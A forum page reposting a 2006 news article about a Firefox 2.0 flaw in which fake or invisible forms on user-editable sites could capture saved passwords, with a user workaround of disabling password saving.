Godlike Productions - Discussion Forum
Users Online Now: 2,131 (Who's On?)Visitors Today: 383,290
Pageviews Today: 635,782Threads Today: 215Posts Today: 3,914
08:39 AM


Back to Forum
Back to Forum
Back to Thread
Back to Thread
REPLY TO THREAD
Subject Firefox flaw enables hackers to steal passwords
User Name
 
 
Font color:  Font:








In accordance with industry accepted best practices we ask that users limit their copy / paste of copyrighted material to the relevant portions of the article you wish to discuss and no more than 50% of the source material, provide a link back to the original article and provide your original comments / criticism in your post with the article.
Original Message Thursday, 23 November 2006

One of the things that users like about Firefox - it's ability to remember passwords - has suddenly become a liability because of new vulnerability that allows hackers to steal previously saved passwords.

The vulnerability, which affects the latest release of Firefox, version 2.0, has been called a reverse cross-site request (RCSR) by its discoverer Robert Chapin, a Microsoft Certified Engineer.

According to Chapin, the flaw could affect anyone visiting a weblog or forum website that allows user-contributed HTML codes to be added.

Basically, what can occur is that a hacker can put up a fake form on a trusted site like MySpace (which has reportedly already occurred) and users simply have to click on the form for their saved passwords to be transmitted to the hacker's website. Worse still, a hacker can put up an invisible form on a page and users can unwittingly transmit their passwords unwittingly by clicking on the part of the page that contains the invisible form.

On his website, Chapin says that Internet Explorer 7 users could also be vulnerable to such attacks but less so because passwords will not automatically be transitted in Internet Explorer unless the RCSR form appears on the same page as a legitimate login form.

The good news for Firefox users is that the problem is easily fixed until a patch is made available. They can simply untick the remember passwords for sites box which is accessible from the tools menu and selecting options then security.

[link to www.itwire.com.au]
Pictures (click to insert)
5ahidingiamwithranttomatowtf
bsflagIdol1hfbumpyodayeahsure
banana2burnitafros226rockonredface
pigchefabductwhateverpeacecool2tounge
 | Next Page >>





GLP